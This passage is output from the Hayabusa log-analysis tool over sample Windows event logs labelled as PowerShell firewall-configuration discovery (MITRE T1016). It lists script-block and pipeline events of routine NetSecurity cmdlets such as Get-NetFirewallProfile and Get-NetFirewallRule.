Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Open', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetGPO.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.161 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Save-NetGPO { [CmdletBinding(PositionalBinding=$false)] param( [Parameter(ParameterSetName='Save1', Mandatory=$true, Position=0)] [string] ${GPOSession}, [Parameter(ParameterSetName='Save1')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Save1')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Save1')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]' [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Save', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetGPO.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.207 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.364 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]($this.PSBase.CimInstanceProperties['Enabled'].Value + 0),../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.364 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['Enabled'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]$x,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.364 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action]($this.PSBase.CimInstanceProperties['DefaultInboundAction'].Value + 0),../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.364 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['DefaultInboundAction'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action]$x,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.364 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action]($this.PSBase.CimInstanceProperties['DefaultOutboundAction'].Value + 0),../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.364 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['DefaultOutboundAction'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action]$x,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.364 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]($this.PSBase.CimInstanceProperties['AllowInboundRules'].Value + 0),../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.364 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['AllowInboundRules'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]$x,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.364 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]($this.PSBase.CimInstanceProperties['AllowLocalFirewallRules'].Value + 0),../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.364 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['AllowLocalFirewallRules'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]$x,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.364 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]($this.PSBase.CimInstanceProperties['AllowLocalIPsecRules'].Value + 0),../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.364 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['AllowLocalIPsecRules'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]$x,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.364 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]($this.PSBase.CimInstanceProperties['AllowUserApps'].Value + 0),../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.364 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['AllowUserApps'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]$x,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.364 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]($this.PSBase.CimInstanceProperties['AllowUserPorts'].Value + 0),../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.364 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['AllowUserPorts'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]$x,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.364 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]($this.PSBase.CimInstanceProperties['AllowUnicastResponseToMulticast'].Value + 0),../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.364 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['AllowUnicastResponseToMulticast'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]$x,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.364 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]($this.PSBase.CimInstanceProperties['NotifyOnListen'].Value + 0),../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.364 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['NotifyOnListen'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]$x,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.364 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]($this.PSBase.CimInstanceProperties['EnableStealthModeForIPsec'].Value + 0),../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.364 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['EnableStealthModeForIPsec'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]$x,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.364 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"$x = $this.PSBase.CimInstanceProperties[""LogMaxSizeKilobytes""]; if ($x -ne $null -and $x.Value -ne $null -and $x.Value.ToString().ToUpperInvariant().Equals(""4294967296"")) { ""NotConfigured""; } else { $x.Value }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.364 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"param($x) if ($x.ToUpperInvariant().Equals(""NOTCONFIGURED"")) { $this.PSBase.CimInstanceProperties[""LogMaxSizeKilobytes""].Value = 4294967296; } else { $this.PSBase.CimInstanceProperties[""LogMaxSizeKilobytes""].Value = [uint32]$x; }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.364 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]($this.PSBase.CimInstanceProperties['LogAllowed'].Value + 0),../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.364 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['LogAllowed'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]$x,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.364 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]($this.PSBase.CimInstanceProperties['LogBlocked'].Value + 0),../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.364 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['LogBlocked'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]$x,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.364 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]($this.PSBase.CimInstanceProperties['LogIgnored'].Value + 0),../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.364 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['LogIgnored'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]$x,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.473 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-NetFirewallProfile): ""Get-NetFirewallProfile"" ParameterBinding(Get-NetFirewallProfile): name=""Name""; value="""" ParameterBinding(Get-NetFirewallProfile): name=""AssociatedNetFirewallRule""; value="""" ParameterBinding(Get-NetFirewallProfile): name=""AssociatedNetIPsecRule""; value="""" ParameterBinding(Get-NetFirewallProfile): name=""AssociatedNetIPsecMainModeRule""; value="""" ParameterBinding(Get-NetFirewallProfile): name=""All""; value=""False"" ParameterBinding(Get-NetFirewallProfile): name=""PolicyStore""; value="""" ParameterBinding(Get-NetFirewallProfile): name=""GPOSession""; value="""" ParameterBinding(Get-NetFirewallProfile): name=""CimSession""; value="""" ParameterBinding(Get-NetFirewallProfile): name=""ThrottleLimit""; value=""0"" ParameterBinding(Get-NetFirewallProfile): name=""AsJob""; value=""False""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.489 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default"" ParameterBinding(Out-Default): name=""InputObject""; value=""MSFT_NetFirewallProfile (InstanceID = ""MSFT?FW?FirewallProfile?Domain"")"" ParameterBinding(Out-Default): name=""InputObject""; value=""MSFT_NetFirewallProfile (InstanceID = ""MSFT?FW?FirewallProfile?Private"")"" ParameterBinding(Out-Default): name=""InputObject""; value=""MSFT_NetFirewallProfile (InstanceID = ""MSFT?FW?FirewallProfile?Public"")""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.489 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"[System.Diagnostics.DebuggerHidden()] param() $foundSuggestion = $false if($lastError -and ($lastError.Exception -is ""System.Management.Automation.CommandNotFoundException"")) { $escapedCommand = [System.Management.Automation.WildcardPattern]::Escape($lastError.TargetObject) $foundSuggestion = @(Get-Command ($ExecutionContext.SessionState.Path.Combine(""."", $escapedCommand)) -ErrorAction Ignore).Count -gt 0 } $foundSuggestion",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.489 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"""The command $($lastError.TargetObject) was not found, but does exist in the current location. Windows PowerShell does not load commands from the current location by default. If you trust this command, instead type `"".\$($lastError.TargetObject)`"". See `""get-help about_Command_Precedence`"" for more details.""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.489 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:08.223 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Get-NetFirewallRule,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:08.239 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:08.317 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"$this.PSBase.CimInstanceProperties[""DisplayName""].Value",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:08.317 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"param($x) ; $this.PSBase.CimInstanceProperties[""DisplayName""].Value = $x ; $this.PSBase.CimInstanceProperties[""ElementName""].Value = $x",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:08.317 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled]($this.PSBase.CimInstanceProperties['Enabled'].Value + 0),../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:08.317 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['Enabled'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled]$x,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:08.317 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile]($this.PSBase.CimInstanceProperties['Profiles'].Value + 0),../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:08.317 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['Profiles'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile]$x,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:08.317 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction]($this.PSBase.CimInstanceProperties['Direction'].Value + 0),../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:08.317 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['Direction'].Value = 